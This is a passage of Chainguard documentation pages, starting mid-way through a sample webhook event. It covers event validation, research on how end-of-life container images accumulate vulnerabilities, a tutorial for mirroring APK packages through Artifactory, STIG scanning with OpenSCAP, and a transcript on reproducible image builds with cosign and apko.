"45a0cEXAMPLE977f050c5fb9EXAMPLEeed764595/e2fca7026fbaa243", "tag": "1-dev", "digest": "sha256:043446cbda630e5071e4f72736b38b5249c859d07bb14886cd93b4e36fc3402c", "method": "HEAD", "type": "manifest", "when": "2025-04-23T00:37:47.810899", "location": "", "remote_address": "76.169.101.202", "user_agent": "docker/27.3.1 go/go1.22.7 git-commit/41ca978 kernel/6.8.0-57-generic os/linux arch/amd64 UpstreamClient(Docker-Client/27.3.1 \\(linux\\))" } } This sample request has the following headers: Header Value accept-encoding gzip traceparent 00-6f9aceb3276e8c60676cf04099d8818d-dd75e26d099ef057-00 original-traceparent 00-6f9aceb3276e8c60676cf04099d8818d-dd75e26d099ef057-00 content-type application/json ce-type dev.chainguard.registry.pull.v1 ce-time 2025-04-23T00:37:47Z ce-subject 45a0c61ea6fd977f050c5fb9ac06a69eed764595/7214b8ddd5ce879d ce-specversion 1.0 ce-source cgr.dev ce-id 188888b6-27d2-4a80-8ad5-c7450ab89c0c ce-group 45a0c61ea6fd977f050c5fb9ac06a69eed764595 ce-audience customer ce-actor enforce-prod-registry-jzjewxe4@prod-enforce-fabc.iam.gserviceaccount.com authorization Bearer … content-length 721 user-agent Chainguard Enforce bd6a3e9-dirty host webhook.site This shows that you have successfully subscribed the test service to Chainguard Events. Filtering Events The webhook will get all events for your organization. You will need to filter them to only the events you are interested in, which can be done using the ce-type header. For pull events the type is dev.chainguard.registry.pull.v1 and push events are of type dev.chainguard.registry.push.v1. A full description of all events and their types is available on Chainguard Academy. Validating Events Before processing an event from Chainguard, you should ensure that it is valid. Every Chainguard event has a JSON Web Token (JWT) formatted OIDC ID token in its Authorization header. For authorization purposes, there are two important fields to validate: Use the iss field to ensure that the issuer is Chainguard, specifically https://issuer.enforce.dev. Use the sub field to check that the event matches your configured Chainguard identity. For example, assuming a UIDP ID of 0475f6baca584a8964a6bce6b74dbe78dd8805b6, the sub field’s value will resemble the following: webhook:0475f6baca584a8964a6bce6b74dbe78dd8805b6. If the subscription is in a sub-group, then the value will have the corresponding group SUID appended to the path. Validating these fields before processing the JWT token using a verification library can save resources, as well as alert you about suspicious traffic or misconfigured Chainguard organization settings. Use Cases Events can be used to drive a wide range of processing scenarios, including the following: Copying images to another registry when an image is updated Kicking off an image rebuild process when a base image is updated Logging new image availability to a Slack channel Logging pulls and user creation to check for unexpected or unauthorized usage Chainguard’s platform-examples repository contains example code for implementing workflows based on events. Most examples are based on Terraform and work with the Google Cloud Platform, but should be portable to other environments. Learn More This article outlined details on what Chainguard Events are, how to use them, and some common use cases. For more information on CloudEvents, you can refer to cloudevents.io. You can also find more details in Chainguard’s CloudEvents reference documentation. --- ### How End-of-Life Software Accumulates Vulnerabilities URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/updating-images/how-eol-software-accumulates-cves/ Last Modified: December 4, 2024 Tags: Chainguard Containers, CVE Typically, specific versions of software receive updates on a schedule for a set amount of time. Eventually, though, every version of software will stop receiving support. When project maintainers stop providing updates, it’s known as the End-of-Life (EOL) stage. Because it’s no longer being actively maintained, software begins to collect vulnerabilities when it reaches EOL. This problem can become compounded when using container images, as they often come with extra components from underlying base images which are all prone to accruing vulnerabilities. This can lead to images with hundreds of components, each collecting vulnerabilities and forming part of the attack surface. This conceptual article highlights the risk involved with using end-of-life software by outlining how EOL images accrue vulnerabilities and where they accumulate. Findings Chainguard’s internal research team came to the following conclusions after scanning a set of official Docker images that had reached EOL: Takeaway 1: The longer a project has been EOL, the more vulnerabilities that image will have. On average, an EOL image will accumulate 218 vulnerabilities every six months. Takeaway 2: 98.4% of these vulnerabilities accumulate within a given image’s components, 1.4% in the application dependencies, and only 0.2% of vulnerability accumulation every six months are directly within the application. With these takeaways in mind, it’s clear that images with EOL software can quickly develop serious security risks. Not only does the target application accumulate vulnerabilities, but so do the dependencies and additional image components, and at a much faster pace. When a vulnerability appears directly in the source code of the application, that application isn’t going to receive a patch from upstream. This means you’ll be forced to update the software or even move on from EOL projects or risk compromising your application’s security. Vulnerability accumulation in EOL images To perform this analysis, Chainguard’s researchers reviewed a set of software projects listed on endoflife.date, a website that keeps track of when products are no longer supported. We matched these projects directly with their official Docker Hub images, finding 38 projects across 237 EOL version releases from 2020–2024. This included popular images such as Traefik, nginx, Rust, and Python. Each version is the last within the project lifecycle right before the EOL date, representing the final updates to the project before it goes EOL. We then used Grype to scan each release to determine where vulnerabilities are appearing in the projects. When scanning an image for vulnerabilities, our researchers would classify a vulnerability as being in one of three locations: Application: The core software intended for execution, fulfilling the container’s primary purpose. Think of images such as Traefik, Consul, or nginx. Application dependencies: Software or libraries the application requires to function and are dependent on the core application source code. For example, Traefik depends on a TOML parser for Golang. Image components: Additional packages or libraries included within the image, often influenced by the base image. For example, Traefik uses the base Alpine image and thus includes many of its packages. Within this dataset, the support lifespan for these projects was almost two years, with the median support duration being one year. By aggregating vulnerability counts in six-month intervals based on the EOL date, we calculated the average number of vulnerabilities per project. We noted these versions as the last version prior to the EOL date, representing the final updates for that project lifecycle. The number of vulnerabilities between older EOL versions and recent EOL versions drastically differ, as shown in the following diagram. For example, the average number of vulnerabilities of an image that went EOL in early 2020 contained 2,065 by 2024, compared to images that reached EOL in 2024 containing 323 vulnerabilities. On average, this equates to an accumulation rate of 218 vulnerabilities every six months in EOL images. Where are the vulnerabilities? Time since EOL Application Vulns Application Dependency Vulns Image Component Vulns 0-6 months <1 CVE 3 CVEs 351 CVEs 6-12 months 1 CVE 11 CVEs 542 CVEs 12+ months 3 CVEs 33 CVEs 1,601 CVEs Application vulnerabilities Less than 1% of vulnerability accumulation occurs directly in an image’s application, and we found that only 14% of versions that contained a vulnerability included a vulnerability directly within the application in the first six months post-EOL. Project maintainers won’t patch these CVEs, and updating to a newer version or patching it yourself in the source code are the only options for addressing these vulnerabilities. Dependency vulnerabilities In the first six months after an image reaches the EOL stage, 40% of versions contain a vulnerability in the application dependencies. The following table outlines how many vulnerabilities, on average, a dependency will accumulate over time: Time span Number of CVEs 0-6 months 3 6-12 months 11 12+ months 32 Fixing these would involve upgrading dependencies and rebuilding the target application, a difficult and labor-intensive task. Image component vulnerabilities As mentioned previously, more than 98% of vulnerability accumulation occurs within the components of the image: Time span Number of CVEs 0-6 months 340 6-12 months 501 12+ months 1,552 Ninety-seven percent of these vulnerabilities are within Debian packages. Per this blog post many of these vulnerabilities are found in the latest stable versions of these Debian packages, meaning that you can’t make them go away with just an apt upgrade. A deeper look at Traefik When scanning the official Alpine-based image for Traefik with Grype, Chainguard’s researchers found that the image versions generally accumulated fewer vulnerabilities than typical, with an average of 25 vulnerabilities identified every six months, as shown in the previous table. Take version 2.9 of Traefik as an example. It was released on October 3, 2022, with security support provided until April 24, 2023, which is roughly six months. The final update for this version, 2.9.10, was made available on April 6, 2023, just three weeks before the end of its support lifecycle. Following the release of version 2.9.10, 55 vulnerabilities were reported: four within Traefik itself, 31 associated with its application dependencies, and 20 related to the Docker image components. Below are example CVEs within the various locations of 2.9.10 of the official Traefik Docker image. Example CVE within Traefik ‍CVE-2023-47633: Traefik docker container using 100% CPU. This issue was addressed in versions 2.10.6 and 3.0.0-beta5. There are no known workarounds for this vulnerability; your only option is to upgrade. Example CVE within a dependency (Docker) of Traefik ‍CVE-2023-28840: Docker Swarm encrypted overlay network may be unauthenticated. The affected project is github.com/docker/docker, a dependency of Traefik. We fixed this vulnerability in the Chainguard Container of the Traefik 2.10 cycle. Example CVE within an image component of Traefik ‍CVE-2023-5363: An out-of-bounds write within OpenSSL, a dependency of the base image Alpine 3.17 used by Traefik (impacts libcrypto3 and libssl3). The Chainguard Container of Trafeik uses the wolfi-base image, which runs the updated versions of libcrypto3 and libssl3. Learn More End-of-life software represents a significant security risk. This issue becomes particularly critical when vulnerabilities are found directly in the target application of the image. The only option when that occurs is to update. However, the vast majority of vulnerabilities that appear in an EOL image will come from its additional components, meaning that updating just the application software may not significantly reduce the overall number of vulnerabilities. Thus the best option is to have a plan to keep your software updated to the latest versions promptly. To learn more about keeping container images up to date, we encourage you to check out our article on Considerations for Keeping Containers Up to Date as well as our overview of Strategies and Tooling for Updating Container Containers. --- ### How to Mirror Packages from Chainguard Package Repositories to Artifactory URL: https://edu.chainguard.dev/chainguard/chainguard-registry/pull-through-guides/artifactory/artifactory-packages-pull-through/ Last Modified: November 14, 2024 Tags: Chainguard Containers, Product This tutorial outlines how to set up remote Alpine package repositories with JFrog Artifactory. Specifically, it will walk you through how to set up two repositories you can use as a pull through cache for Chainguard’s public package repositories. This guide will then outline how you can configure an image to pull APK packages from these repositories. It will also go over how you can use one of Artifactory’s virtual repositories as a pull through cache. Prerequisites In order to complete this tutorial, you will need administrative privileges over an Artifactory instance. If you’re interested in testing out this configuration, you can set up a trial instance on the JFrog Artifactory landing page. Note: As you follow this guide, you may run into issues if your Artifactory username is an email address; specifically, the @ sign can lead to errors. For simplicity’s sake, we recommend that you use a user profile with a name that only contains letters and numbers. If you must use an email address as yourr Artifactory username, though, this guide will include instructions for working around the issue. Setting Up Remote Artifactory Repositories to Mirror Public Chainguard Package Repositories To set up a remote repository in Artifactory from which you can pull public Chainguard packages, log in to the JFrog platform. Once there, select on the Administration tab near the top of the screen and select Repositories from the left-hand navigation menu. On the Repositories page, click the Create a Repository button and select the Remote option. Next, you’ll need to select the type of repository to set up. Because all packages offered by Chainguard are APKs, select Alpine. First, we’ll set up a remote repository to mirror the Wolfi APK packages repository. On the new page, you can enter the following details in the Basic configuration tab: Repository Key — This is used to refer to your remote repository. You can choose whatever name you like here, but this guide’s examples will use the name cg-wolfi. URL — This must be set to https://packages.wolfi.dev/os. Keep all the remaining fields set to their default values and click the Create Remote Repository button. A modal window will appear letting you know that the repository was created successfully. For now, hold off on clicking the Set Up Alpine Client button, as you will take care of configuring this repository shortly. Before getting to that, repeat the process to create another remote repository. This one will serve as a pull through for Chainguard’s Extra Packages repository. This repository provides the latest packages for software products with non-open-source licenses. Once again, from the Repositories page, click the Create a Repository button, select the Remote option, and then select Alpine to create an Alpine repository. Enter the following details for your new remote repository in the Basic configuration tab: Repository Key — Again, you can choose whatever name you like here, but this guide’s examples will use the name cg-extras. URL — This must be set to https://packages.cgr.dev/extras. Following that, click the Create Remote Repository button to create the new remote repository. Generate tokens for remote repositories Before testing whether you’re able to pull packages through the remote repositories, you will need to retrieve a token generated by Artifactory for both of them. To generate these tokens, you can either click the Set Up Alpine Client button after creating the remote repository or you can retrieve them from the Repositories page. On the Repositories page, find the ellipsis (⋯) all the way to the right of the repository’s row. Click on it, and then select Set me up. This will open a modal window from the right side of the page. Click the Generate Token & Create Instructions button, which will generate two code blocks whose contents you can copy. The first code block will contain a token you can use to access the remote Artifact repository. The second block will contain an echo command you can use to add a URL to an /etc/apk/repositories file. Take note of the token generated for each repository. Then, run the following export commands to create a few environment variables, replacing my-wolfi-token and my-extras-token with the respective token you noted down. You will use these environment variables in the next sections as you test out these remote repositories: export WOLFI_TOKEN=my-wolfi-token export EXTRAS_TOKEN=my-extras-token Additionally, create two more environment variables to hold your Artifactory user profile and hostname: export ARTIFACTORY_USER_PROFILE=my-user-profile export ARTIFACTORY_HOSTNAME=my-artifactory-hostname If you aren’t sure of these values, you can find them in the command from the Set Up An Alpine Client window where you found the token: sudo sh -c "echo 'https://linky:<TOKEN>@example-hostname.jfrog.io/artifactory/cg-wolfi/<BRANCH>/<REPOSITORY>'" >> /etc/apk/repositories In this example, the Artifactory user profile is linky and the hostname is example-hostname. If your Artifactory user profile is an email address, you will encounter an error unless you percent-encode the @ sign, like this: export ARTIFACTORY_USER_PROFILE=linky%40example.com Here, the Artifactory user profile is linky@example.com. Testing pull through from remote package repositories interactively In order to test that you’re able to pull packages from the remote Artifactory repositories you just created, this section outlines how to build a container image (using a Chainguard image as a base) and configure it to pull packages from these repositories. Open a terminal and create a Dockerfile: cat > Dockerfile <<EOF FROM cgr.dev/chainguard/python:latest-dev USER root RUN mv /etc/apk/repositories /etc/apk/repositories.disabled RUN echo 'https://$ARTIFACTORY_USER_PROFILE:$WOLFI_TOKEN@$ARTIFACTORY_HOSTNAME.jfrog.io/artifactory/cg-wolfi/' >> /etc/apk/repositories RUN echo 'https://$ARTIFACTORY_USER_PROFILE:$EXTRAS_TOKEN@$ARTIFACTORY_HOSTNAME.jfrog.io/artifactory/cg-extras/' >> /etc/apk/repositories EOF This Dockerfile uses the python:latest-dev image, but you can use any image which you have access to. However, after the image is built we will open up an interactive shell to test whether we can actually install packages from these repos with apk, so whatever image you use should be one that has a shell available. Note that this Dockerfile renames the default /etc/apk/repositories field. This isn’t necessary, but doing so will allow you to ensure that you’re actually downloading packages from the remote Artifactory repositories instead of the default ones. After creating the Dockerfile, use it to build a new image. Here, we tag the image ar-interactive: docker build -t ar-interactive . Once the image is built, run it. Be sure to include the -it and --entrypoint options to run it with an interactive shell: docker run -it --entrypoint /bin/sh ar-interactive Now that the container is running, you can check whether it was configured correctly and that you can pull packages from the remote Artifactory repositories. First check that the /etc/apk/repositories file contains the correct lines: cat /etc/apk/repositories https://<ARTIFACTORY-USER-PROFILE>:<WOLFI-TOKEN>@<ARTIFACTORY-HOSTNAME>.jfrog.io/artifactory/cg-wolfi/ https://<ARTIFACTORY-USER-PROFILE>:<EXTRAS-TOKEN>@<ARTIFACTORY-HOSTNAME>.jfrog.io/artifactory/cg-extras/ Then test that you can install a package from these repositories with apk. This example installs the curl package: apk add curl fetch https://<ARTIFACTORY-USER-PROFILE>:*@<ARTIFACTORY-HOSTNAME>.jfrog.io/artifactory/cg-wolfi/ fetch https://<ARTIFACTORY-USER-PROFILE>:*@<ARTIFACTORY-HOSTNAME>.jfrog.io/artifactory/cg-extras/ (1/1) Installing curl (8.11.0-r0) Executing glibc-2.40-r3.trigger Executing busybox-1.37.0-r0.trigger OK: 576 MiB in 77 packages This output shows that curl was indeed correctly installed from the remote Artifactory repository. You can confirm this from the Artifactory dashboard. Navigate to the Application tab, then select Artifactory in the left-hand navigation menu and select Artifacts. From there, expand the menu option for the cg-wolfi Artifactory repository. There, you will find the curl package listed. This shows that the pull through and caching occurred as expected. Testing pull through within a build You can also use the remote Artifactory repositories to install packages directly within a Dockerfile. To try this out, create another Dockerfile: cat > Dockerfile.build <<EOF FROM cgr.dev/chainguard/python:latest-dev USER root RUN mv /etc/apk/repositories /etc/apk/repositories.disabled RUN echo 'https://$ARTIFACTORY_USER_PROFILE:$WOLFI_TOKEN@$ARTIFACTORY_HOSTNAME.jfrog.io/artifactory/cg-wolfi/' >> /etc/apk/repositories RUN echo 'https://$ARTIFACTORY_USER_PROFILE:$EXTRAS_TOKEN@$ARTIFACTORY_HOSTNAME.jfrog.io/artifactory/cg-extras/' >> /etc/apk/repositories RUN apk add nodejs-22 USER nonroot EOF This example will install the nodejs-22 package into the built image. After creating the Dockerfile, build the image. Note that this command includes the -f option to specify that it should build the image with the Dockerfile you just created: docker build -t ar-build -f Dockerfile.build . Once again, you can confirm that the pull through and caching worked as expected by checking the Artifacts page in the Artifactory dashboard. Setting Up a Virtual Repository to Mirror Packages Artifactory allows you to create what it refers to as virtual repositories. A virtual repository is a collection of one or more repositories (such as local, remote, or other virtual repositories) that have the same package type. The benefit of this is that you can access resources from multiple locations using a single logical URL. You can also use a virtual repository as a pull through cache. To illustrate, create a new virtual repository. From the Repositories tab, click the Create a Repository button. This time, select the Virtual option, but instead of selecting the Alpine package type, select Generic. You can use the Alpine package type, but virtual Alpine repositories will only allow you to pull packages that have already been cached by an associated remote repository. A Generic artifact repository will provide more flexibility. On the New Virtual Repository page, enter a key of your choosing into the Repository Key field. You can enter whatever you’d like here, but for this guide we will refer to this repository as cg-apk-virt. Next, you must select existing repositories to include within this virtual repository. To keep things simple, we will use the cg-wolfi and cg-extras repositories created previously. Select your repositories by clicking their respective checkboxes. Then be sure to click the right-pointing chevron to move them to the Selected Repositories column. Finally, click the Create Virtual Repository button. As before, a modal window will appear letting you know that the repository was created successfully. Click the Set Up Generic Client button at the bottom of this window to retrieve the token you’ll need to test whether you can pull images through this repository. With this token in hand, create another environment variable: export VIRTUAL_TOKEN=my-virtual-repo-token You’ll use this token to create one more Dockerfile in the next section. Testing pull through with a virtual package repository As outlined previously, create a Dockerfile that configures an image to use the virtual repository you just created. You can test this out however you like, but we will stick to one example here showing how to install a package into the built image: cat > Dockerfile.virtual <<EOF FROM cgr.dev/chainguard/python:latest-dev USER root RUN mv /etc/apk/repositories /etc/apk/repositories.disabled RUN echo 'https://$ARTIFACTORY_USER_PROFILE:$VIRTUAL_TOKEN@$ARTIFACTORY_HOSTNAME.jfrog.io/artifactory/cg-apk-virt/' >> /etc/apk/repositories RUN apk add nodejs-18 USER nonroot EOF This example will install the nodejs-18 package. After creating the Dockerfile, build the image with the Dockerfile you just created: docker build -t ar-virtual -f Dockerfile.virtual . This command will install the nodejs-18 package from the virtual repository as it builds the image. Debugging pull through from Chainguard’s registry to Artifactory If you run into issues when trying to pull from Chainguard’s package repositories through Artifactory, you can try checking for these common pitfalls: You may run into issues if your Artifactory username is an email address; specifically, the @ sign can lead to errors. Be sure that you’re using a user profile with a name that only contains letters and numbers. Ensure that all network requirements are met. When configuring a remote Artifactory repository, ensure that the URL field is set correctly. It may help to clear the Artifactory cache. It could be that your Artifactory repository was misconfigured. In this case, create and configure a new Remote Artifactory repository to test with. Learn more If you haven’t already done so, you may find it useful to review our Registry Overview to learn more about Chainguard’s registry. You can also learn more about Chainguard Containers by referring to our documentation, and learn more about working with the Chainguard platform by reviewing our Administration documentation. If you’d like to learn more about JFrog Artifactory, we encourage you to refer to the official Artifactory documentation. --- ### STIGs for Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/image-stigs/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product The practice of using Security Technical Implementation Guides, or “STIGs,” to secure various technologies originated with the United States Department of Defense (DoD). If an organization uses a certain kind of software, say MySQL 8.0, they must ensure that their implementation of it meets the requirements of the associated Security Requirements Guides (SRG) in order to qualify as a vendor for the DoD. More recently, other compliance frameworks have begun acknowledging the value of STIGS, with some going so far as to require the use of STIGs in their guidelines. Chainguard announced the release of a STIG for the General Purpose Operating System (GPOS) SRG — an SRG that specifies security requirements for general purpose operating systems running in a network. The goal for this new STIG is that it will help customers confidently and securely integrate Chainguard Containers into their workflows. This conceptual article aims to give a brief overview of what STIGs are and how they can be valuable in the context of container images. It also includes instructions on how to get started with Chainguard’s STIG for the GPOS SRG. Getting Started The recommended way to get started with Chainguard’s STIG for the GPOS SRG is to use the Chainguard openscap Container. This includes the openscap tool itself, the oscap-docker libraries, and the Chainguard GPOS STIG profile. This image is built with the same capabilities and low-to-zero CVEs as every other Chainguard Container, and makes the openscap tool — which can be difficult to set up — more portable. The following instructions assume that you have docker installed and running on your system, and are intended to be performed on a non-production system, similar to the process outlined in DISA’s Container Hardening Whitepaper. For ease of use, we’ll use the datastream file sourced from the Chainguard STIGs repository, and available within Chainguard’s openscap container image. This file serves as a sort of checklist, outlining each of the requirements that must be met in order to conform with the STIG. If you’d like, you can download this datastream file — named ssg-chainguard-gpos-ds.xml — with a command like the following: curl -fsSLO https://raw.githubusercontent.com/chainguard-dev/stigs/main/gpos/xml/scap/ssg/content/ssg-chainguard-gpos-ds.xml The -O option in this example will redirect the file’s contents into a local file also named ssg-chainguard-gpos-ds.xml in your working directory. You can then view the checklist locally. We’ll refer to this as the scan image, and the target image we’ll be scanning will be: cgr.dev/chainguard/wolfi-base:latest. First, start the target image: docker run --name target -d cgr.dev/chainguard/wolfi-base:latest tail -f /dev/null Next, run the scan image against the target image. docker run -i --rm -u 0:0 --pid=host \ -v /var/run/docker.sock:/var/run/docker.sock \ -v $(pwd)/out:/out \ --entrypoint sh \ cgr.dev/chainguard/openscap:latest-dev <<_END_DOCKER_RUN oscap-docker container target xccdf eval \ --profile "xccdf_basic_profile_.check" \ --report /out/report.html \ --results /out/results.xml \ /usr/share/xml/scap/ssg/content/ssg-chainguard-gpos-ds.xml _END_DOCKER_RUN Note that this is a highly privileged container since we’re scanning a container being run by the host’s Docker daemon. The results of the scan will be written to a new subdirectory named out/ within the current working directory. The report.html file will contain a human-readable report of the scan results, and the results.xml file will contain the raw results of the scan. What are STIGs? As mentioned previously, “STIG” is an acronym that stands for Security Technical Implementation Guide. A STIG is akin to the implementation of a Security Requirements Guide (SRG) that a security administrator can go through to ensure that a given piece of software has been hardened against cybersecurity threats. A STIG is typically written by the developer or vendor of the given piece of software against a published DOD Security Requirements Guide (SRG). STIGs are presented in the XCCDF (Extensible Configuration Checklist Description Format), allowing them to be ingested into a SCAP-validated tool to validate that a given target is in compliance with them. After drafting the STIG, the vendor will submit it to the Defense Information Systems Agency (DISA), an agency within the DoD. One of DISA’s responsibilities is publishing and maintaining STIGs on the DoD Cyber Exchange website, and the process from a STIG being submitting to it being published by DISA can take years. As of this writing, DISA has published over 450 STIGs for a wide variety of software applications. How STIGs can be used to harden container images STIGs are typically published for hardware, firmware, and specific applications. However, in recent years containerization has grown in popularity and is now the modern way to deploy applications. This has resulted in there being a gap in terms of clear instructions on how to securely deploy containerized applications. Chainguard produces hardened, minimal container images containing few to zero CVEs. Because of this, they adhere to many compliance standards where there’s a control for vulnerability or risk management, including FedRAMP and PCI DSS v4.0. For many risk management frameworks, the system categorization will result in varying levels of hardening guidelines. Using FedRAMP as an example, FIPS-199 defines the security categorization which will result in a baseline set of controls (defined in NIST 800-53) that must be implemented. Because the NIST 800-53 controls are technology-neutral, the STIGs published by DISA provide technology-specific configurations on how to satisfy the applicable NIST 800-53 control set. As stated in the CM-6 (a) Requirement 1 of the FedRAMP System Security Plan: “The service provider shall use the DoD STIGs to establish configuration settings; Center for Internet Security up to Level 2 (CIS Level 2) guidelines shall be used if STIGs are not available; Custom baselines shall be used if CIS is not available.” However, the requirements for how a STIG applies to a container image are rather unclear. For example, some controls apply to the host operating system instead of the image. Similarly, other controls apply to the container runtime instead of the container itself. Knowing what controls are relevant for containers and how to check for them in a STIG are key to achieving and maintaining FedRAMP compliance. DISA understands that containers have different requirements than traditional operating systems. In an effort to highlight these differences, the DOD DevSecOps Initiative released the Container Hardening Process Guide which describes the Initiative’s approach to hardening images and how other agencies should handle applying STIGs to containers. Appendix C of the Hardening Process Guide highlights an important point about STIG compliance for containers: “With a properly locked down hosting environment, containers inherit most of the security controls and benefits from infrastructure to host OS-level remediation requirements.” Deploying containers on a STIG hardened host provides many of the security features that are difficult or sometimes impossible to implement inside a container. What’s left then is the application-level security configuration — in particular vulnerability remediation — which Chainguard provides through our guaranteed vulnerability remediation SLAs. False positives and the General Purpose OS STIG Here we’ve assembled several explanations for requirements from Chainguard’s General Purpose Operating System STIG that are likely to cause false positives when scanning containers, as well as the rationale for those requirements. By disambiguating these false positives, the following sections should be helpful to any administrators deploying containers in environments where STIG hardening is necessary both as a means to understand where to expend effort performing hardening and for discussions with assessors and compliance personnel. Auditing Auditing capabilities for Linux containers are implemented by the underlying host’s audit configuration. In Linux, the auditing program auditd leverages multiple functions in the running kernel through the Linux Auditing System to capture runtime information such as starting and stopping processes, opening sockets, and accessing files. Linux containers use their host’s kernel, making it impossible to install and operate a separate auditing package inside the container itself. Instead, auditing information must be configured and collected through the auditing configuration of the host. Once configured, logs of container actions are written to the host’s audit log files and are readable only by the host superuser account. These logs must be collected from the host for incident response and reporting. Storage capacity limits, audit process monitoring, remote upload of logs, and associated alerts are the responsibility of the host where the containers are running. Isolation Containers provide process isolation by executing their applications in a constrained environment using the Linux Namespace and cgroup subsystems. Inside the namespace, container processes are only permitted to access a limited set of system resources defined when the container is launched. Processes are further restricted by limits imposed through the cgroup for access to system resources such as system memory or CPU use. Together, namespaces and cgroups isolate security functions of the host operating system from non-security functions of applications running inside the container. This separation makes it possible for container failures to not directly impact the operation of the host and its security functions when caused through processing of invalid inputs or other runtime errors. In the event of a container failure during initialization or shutdown, for example, the host operating system’s security capabilities will continue to function as configured. Minimal container images Chainguard Containers contain only the minimal software needed for the container to perform its intended function. For Nonessential capabilities such as package managers, shell environments, executables, and process launching functions have been removed from many Chainguard Containers and may not be installed once the container is running. This limited implementation means that only the necessary software to operate can run on the container and restricts the installation of additional software on the image during operation. Be sure to have fixed permissions on libraries and executable files in place so that any software installed can’t be modified. The host’s container execution environment further reduces the risk of unauthorized modification of software through Linux container isolation capabilities including namespaces and cgroups. These restrictions prevent unauthorized modification of the host operating system environment. Address Space Layout Randomization (ASLR) ASLR configuration is the responsibility of the host operating system on which containers run. Applications running within a container on a host that has ASLR enabled will automatically be protected by the configuration. No additional action is needed to ensure that container-based applications are protected. Host firewall Linux containers inherit the firewall configuration of their host operating system which dictates which ports on the container can be accessed from the network. Selection of which ports to make accessible on the applications running on the container is the responsibility of the host firewall configuration — an additional application-level firewall inside the container is not necessary. Host filesystem Linux containers use the host’s filesystem for storage of their files and configuration. To protect data at rest inside containers from unauthorized access or modification, you must modify the host operating system’s configuration. As an example, one might set up encrypted virtual filesystems. The host filesystem is also responsible for the size, utilization, and capacity of the physical disks that are used by containers running on that host. Vulnerability scanning The team deploying the container is also responsible for scanning it for vulnerabilities. This scanning can be executed from the host operating system or against the container image when it is stored in a registry. Continuous scanning can be used to detect vulnerabilities that have been identified / announced since the previous scan and determine when updated images should be built and deployed in the environment. Time Linux containers inherit the system time from the underlying host; likewise, containers don’t operate their own separate time services. The host owner is responsible for configuring the host’s time service to generate the timestamp used by its auditing system, perform periodic synchronization, and ensure that only authorized time servers are used as the authoritative source. Time synchronization of the host clock is automatically reflected in the time used by the container. STIGs These containers can be validated against the General Purpose Operating System STIG and other applicable STIGs using the OpenSCAP toolset. OpenSCAP can validate configuration of container images by reviewing the configuration of the image filesystem and can perform interactive checks by executing commands against running containers. Learn more Chainguard’s STIG hardened FIPS Containers are now generally available. You can check out our STIG repo or contact us for more information. If you’d like to learn more about how Chainguard Containers can help you meet FedRAMP compliance, we encourage you to refer to our overview of Chainguard’s FIPS-ready container images. --- ### Reproducibility and Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/repro/ Last Modified: May 20, 2024 Clarification In this video we mention needing to keep copies of old APKs in order to be able to recreate images. This wasn’t fully accurate — in fact we do keep all our previously issued APKs, so you can build images from months (and in the future, years) ago without issue. We currently retain all of these package versions indefinitely (only servicing latest), but in the future we may age things out just to manage the size of the index. Tools used in this video cosign apko diffoci Commands Retrieving the build configuration for the latest version of nginx: cosign verify-attestation \ --type https://apko.dev/image-configuration \ --certificate-oidc-issuer https://token.actions.githubusercontent.com \ --certificate-identity https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main \ cgr.dev/chainguard/nginx:latest | jq -r .payload | base64 -d | jq .predicate > latest.apko.json Building the image: apko publish latest.apko.json ttl.sh/nginx-repro Transcript Okay, so I want to talk about a topic that I think is hugely important to engineering reliability and security, but doesn’t get talked about very much. And that’s reproducibility. Reproducibility is basically the idea that I run the same build twice, I should get the same thing out. And that sounds trivial, but it’s not. For true reproducibility, we want things to be binary identical. That is, I run the same build twice, and I get the same thing out down to the last bit. We also want somebody else in a different time and place to be able to run the same build and get exactly the same thing out again. So this means we need to control versioning, not just the source code and inputs, but also the build tooling. Because if you run with a different version of your build tool, you could well get a different result. But typically where things go wrong is you have unique IDs or timestamps somewhere in your build. And of course, that causes a different result on each run. Now, reproducibility is important to us at Chainguard, and I wanted to show how you can reproduce Chainguard images yourself. So, to the terminal. Okay, so let’s start by pulling the NGINX image. Now, the interesting bit here is this line here. So this is the digest for the NGINX image. The digest is basically a SHA hash of the image, so it uniquely specifies that image. If we manage to recreate this image, we should end up with exactly the same SHA hash. Okay, and the way we’re going to try to recreate it is we’re going to start by using cosign to get the apko image configuration. So this is an attestation that includes the build config to build that image. And what we’re saying here is this attestation should have been signed using the certificate for the corresponding GitHub action, and the identity should correspond to the workflow that created this attestation. Here we specify the image we’re interested in. So here we’ve got nginx:latest. Of course, you can change that for whatever image you’re interested in. We could also have specified the full SHA there. That would have made sense as well. We then extract the payload section from the JSON that gets returned. We deconvert that from base64, and then we pull out the predicate section to finally give us our JSON file that includes our apko. So let’s run that. Okay, and we get some output just telling us that it has managed to successfully verify the attestation, so we know it’s genuine. And let’s take a look at what it’s created. So this is our apko file. It’s a pretty simple build file. Apko is a very simple build system. Basically, all you can do is specify a list of APK packages to install in the image plus some metadata. So at the top there, you saw some stuff relating to UNIX accounts to create, some annotations to add to the image, the architectures we’re going to build for, the CMD line for the Docker file, and then all these lists of versioned APK dependencies. And this is the full list of dependencies. So it’s not the case that libgcc is going to pull in another dependency that’s not listed here. This is the full list. And they’re all coming from packages.wolfi.dev, as we expect. Also set an ENTRYPOINT and some environment stuff. And that’s about it. Okay, so let’s try running apko with that file. We’re actually going to call apko publish. So what we’re seeing here is apko publish, which is going to build from this latest.apko.json file. And then it’s going to publish the image that results to this repo, ttl.sh/nginx-repro. So ttl.sh, if you’ve not seen it, it’s basically a free to use Docker registry that you can upload anything to, but it only sits there for a short amount of time. So it’s a temporary registry for testing things if you like. And that’s from Replicated. So thank you very much, Replicated. Okay, so what’s happening here? I clicked run there. And we’re building images for both AMD64 and ARM64. We see it installed in all the packages. And in fact, you’ll see that twice because, of course, we’re building two images. Also building some of the other container stuff and SBOMs for these images. And that’s about it. Now, important bit is at the bottom here. Here we have our SHA again. So this is the SHA of the image it’s created. And it’s f705. I’ve forgotten what it was before. So let’s download nginx again and see if it matches. And it does. So that’s pretty cool. We’ve managed to recreate this Chainguard image bit for bit and push it to this repo. And it’s relatively unusual for build tooling to be able to do that with container images. But here we’ve done it with apko and Chainguard images. There are, however, a few things to be aware of. So if I take a look at this latest.apko.json, first thing to be aware of is all these APKs are specified as specific versions that were used. Now, Wolfi is a rolling repo. We don’t keep older versions of packages for very long. So in six 